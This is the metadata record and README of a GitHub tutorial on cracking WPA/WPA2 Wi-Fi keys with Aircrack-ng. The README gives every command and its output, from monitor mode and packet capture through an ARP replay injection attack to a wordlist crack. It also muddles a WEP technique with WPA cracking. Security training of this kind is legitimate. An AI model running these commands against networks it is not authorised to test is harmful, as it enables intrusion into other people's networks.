{"id":13908725,"url":"https://github.com/david-palma/wifi-cracking","last_synced_at":"2026-01-31T13:10:40.555Z","repository":{"id":169979369,"uuid":"191064152","full_name":"david-palma/wifi-cracking","owner":"david-palma","description":"A guide to using the Aircrack-ng suite for cracking 802.11 WEP and WPA/WPA2-PSK keys, including techniques like packet sniffing and injection attacks to test Wi-Fi network security.","archived":false,"fork":false,"pushed_at":"2023-05-27T08:18:43.000Z","size":8,"stargazers_count":54,"open_issues_count":0,"forks_count":9,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-01-31T16:30:52.372Z","etag":null,"topics":["aircrack-ng","education","hack","hacking","infosec","injection-attacks","packet-sniffing","practice","security","tutorial","wep","wifi","wifi-cracking","wireless-security","wpa","wpa2","wpa2-psk"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/david-palma.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-06-09T23:05:31.000Z","updated_at":"2025-01-23T15:58:02.000Z","dependencies_parsed_at":null,"dependency_job_id":"44507bee-d530-4047-8933-58d5da8a6e4a","html_url":"https://github.com/david-palma/wifi-cracking","commit_stats":null,"previous_names":["david-palma/wifi-cracking"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/david-palma%2Fwifi-cracking","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/david-pa
lma%2Fwifi-cracking/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/david-palma%2Fwifi-cracking/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/david-palma%2Fwifi-cracking/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/david-palma","download_url":"https://codeload.github.com/david-palma/wifi-cracking/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245678902,"owners_count":20654738,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aircrack-ng","education","hack","hacking","infosec","injection-attacks","packet-sniffing","practice","security","tutorial","wep","wifi","wifi-cracking","wireless-security","wpa","wpa2","wpa2-psk"],"created_at":"2024-08-06T23:02:56.655Z","updated_at":"2026-01-31T13:10:35.524Z","avatar_url":"https://github.com/david-palma.png","language":null,"funding_links":[],"categories":["HarmonyOS"],"sub_categories":["Windows Manager"],"readme":"# Wi-Fi cracking with aircrack-ng\n\n[Aircrack-ng](https://aircrack-ng.org/) is basically a network software suite that has been crafted to achieve the following objectives:\n\n* packet sniffing\n* attacking (replay attacks, deauthentication, fake access points...) 
via packet injection\n* testing Wi-Fi cards and driver capabilities (capture and injection)\n* cracking WEP and WPA/WPA2 Wi-Fi routers\n\nNote that the present tutorial is not an exhaustive guide; rather, it is intended to build some basic skills to test your own network's security and get familiar with the concepts.\n\nThe attack outlined below is based on a passive technique (ARP request replay attack) and focuses on Debian-based distributions, assuming you have a working wireless card with drivers already patched for injection.\n\n## Aircrack-ng installation\n\nAircrack-ng can be installed on a Debian-based operating system by compiling the source code (for more details you can visit the [official website](https://aircrack-ng.org/)).\n\n### Installing required and optional dependencies\n\nBelow you can find instructions for installing the basic requirements to build aircrack-ng for Debian-based operating systems.\n\n```ShellSession\n$ sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils\n```\n\nGet the latest copy of aircrack-ng:\n\n```ShellSession\n$ git clone https://github.com/aircrack-ng/aircrack-ng\n$ cd aircrack-ng\n```\n\n### Compiling and installing\n\nTo build aircrack-ng, the Autotools build system is used.\nFirst, `./configure` the project for building with the appropriate options:\n\n```ShellSession\n$ autoreconf -i\n$ ./configure --with-experimental\n```\n\nNext, compile the project with the `make` command and use the \"installing\" target from the additional targets listed below to complete the installation.\n\n* Execute all unit tests: `make check`\n* Execute all integration tests (requires root): `make integration`\n* Installing: `make install`\n* Uninstall: `make uninstall`\n\n## Test wireless device packet injection\n\nThe purpose of 
this step is to ensure that your card supports injection.\nAssuming your interface name is \"wlan0\" (you can retrieve it by typing `iwconfig` in the terminal), type the following command:\n\n```ShellSession\n# aireplay-ng --test wlan0\n```\n\nThe system responds:\n\n```ShellSession\n18:10:59  wlan0 channel: 10\n18:10:59  Trying broadcast probe requests...\n18:10:59  Injection is working!\n18:11:00  Found 1 AP\n...\n```\n\nThis confirms your card can inject packets.\n\n## Simple sniffing and cracking\n\n### 1. Start the wireless interface in monitor mode\n\nThe first thing to do is to look for a potential target by putting your wireless card into monitor mode using `airmon-ng`. However, it is strongly recommended to `kill` all interfering processes prior to using the aircrack-ng suite.\n\n```ShellSession\n# airmon-ng check kill\nKilling these processes:\n\n  PID Name\n  870 dhclient\n 1115 wpa_supplicant\n```\n\nThen enable monitor mode, which creates another interface (mon0):\n\n```ShellSession\n# airmon-ng start wlan0\n\nPHY         Interface       Driver         Chipset\n\nphy0        wlan0           ath9k          Qualcomm Atheros AR9485\n                               (monitor mode enabled for [phy0]wlan0 on [phy0]mon0)\n```\n\nYou will notice that \"wlan0\" has successfully been put into monitor mode.\nThen, start `airodump-ng` to look for networks:\n\n```ShellSession\n# airodump-ng mon0\n```\n\nLocate the wireless network you want to crack, and note its BSSID and channel from the following output:\n\n```ShellSession\nCH 10 ][ Elapsed: 36 s][2019-05-15 18:15\nBSSID              PWR  RXQ  Beacons  #Data,  #/s  CH  MB  ENC  CIPHER AUTH ESSID\n08:00:BF:E6:31:2E  -21  100     5240  178307  338  10  54  WPA  CCMP   PSK  infosec_router\n...\n```\n\nNote that the top part of the output lists information about APs in range, and the bottom part lists clients connected to the corresponding APs.\n\n### 2. 
Start airodump-ng to capture the initialization vectors\n\nOpen another console session to capture the initialization vectors generated by the target and to save the result into a file:\n\n```ShellSession\n# airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0\n```\n\nwhere `-c 10` is the channel for the wireless network, `--bssid 08:00:BF:E6:31:2E` is the MAC address of the AP, `-w output-file` defines the output files that will contain the initialization vectors, and `mon0` is the interface name.\n\nThe system responds:\n\n```ShellSession\nCH 10 ][ Elapsed: 12 s][2019-05-15 18:16\nBSSID              PWR  RXQ  Beacons  #Data,  #/s  CH  MB  ENC  CIPHER AUTH ESSID\n08:00:BF:E6:31:2E  -21  100     5240  178307  338  10  54  WPA  CCMP   PSK  infosec_router\n\nBSSID              STATION            PWR  Lost  Packets  Probes\n08:00:BF:E6:31:2E  00:0F:35:51:AC:22  -21     0   183782\n```\n\nAfter the command has run, various files will be generated.\n\n### 3. Start aireplay-ng in ARP request replay mode\n\nThe classic ARP request replay attack is the most effective way to generate new initialization vectors, and works very reliably. The purpose of this step is to start `aireplay-ng` in a mode which listens for ARP requests and then reinjects them back to the access point.\nKeep your `airodump-ng` and `aireplay-ng` running, open another terminal and run the ARP request replay attack:\n\n```ShellSession\n# aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0\n\nSaving ARP requests in replay_arp-0321-191525.cap\nYou should also start airodump-ng to capture replies.\nRead 618643 packets (got 304896 ARP requests), sent 194947 packets...\n```\n\nYou can check if the packets are injected by looking at the `airodump-ng` screen.\n\n### 4. Run aircrack-ng to obtain the WPA key\n\nAt this point, you should be able to obtain the WPA key from the initialization vectors gathered in the previous steps. 
To perform this attack you need a wordlist; if the network password is not in the wordlist, you will not crack it. Note that most WPA/WPA2 routers come with strong 12-character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the [WPA-length password lists](https://github.com/david-palma/wordlists#passwords-with-wpa-length).\n\nOpen another console session and type:\n\n```ShellSession\n# aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap\n```\n\nwhere `-a2` specifies the attack mode for WPA/WPA2-PSK, `-w wordlist.txt` refers to your own dictionary wordlist, and `output*.cap` selects all output files with `.cap` extension.\n\nThis is the output of a successful attack:\n\n```ShellSession\n                        Aircrack-ng 1.5.2\n[00:00:00] 192/1229 keys tested (520.04 k/s)\n\nTime left: 0 seconds                                      15.62%\n\n                     KEY FOUND! [ notsecure ]\n\nMaster Key     : 42 28 5E 5A 73 33 90 E9 34 CC A6 C3 B1 CE 97 CA\n                 06 10 96 05 CC 13 FC 53 B0 61 5C 19 45 9A CE 63\n\nTransient Key  : 86 D0 43 C9 AA 47 F8 03 2F 71 3F 53 D6 65 F3 F3\n                 86 36 52 0F 48 1E 57 4A 10 F8 B6 A0 78 30 22 1E\n                 4E 77 F0 5E 1F FC 73 69 CA 35 5B 54 4D B0 EC 1A\n                 90 FE D0 B9 33 06 60 F9 33 4B CF 30 B4 A8 AE 3A\n\nEAPOL HMAC     : 8E 52 1B 51 E8 F2 7E ED 95 F4 CF D2 C6 D0 F0 68\n```\n\n## List of commands\n\nBelow you can find the list of all of the commands needed to crack a WPA/WPA2 network.\n\n```\n# kill all interfering processes prior to using aircrack-ng\nairmon-ng check kill\n\n# put your network device into monitor mode\nairmon-ng start wlan0\n\n# listen for all nearby beacon frames to get target BSSID and channel\nairodump-ng mon0\n\n# start listening for the handshake on a new console session\nairodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0\n\n# start the 
ARP request replay attack\naireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0\n\n# run aircrack-ng to obtain the WPA key\naircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap\n```\n\n## License\n\nThis project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.\n\n## Disclaimer\n\nThis tutorial has been made for educational purposes only; I don't promote malicious practices and I will not be responsible for any illegal activities.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdavid-palma%2Fwifi-cracking","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdavid-palma%2Fwifi-cracking","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdavid-palma%2Fwifi-cracking/lists"}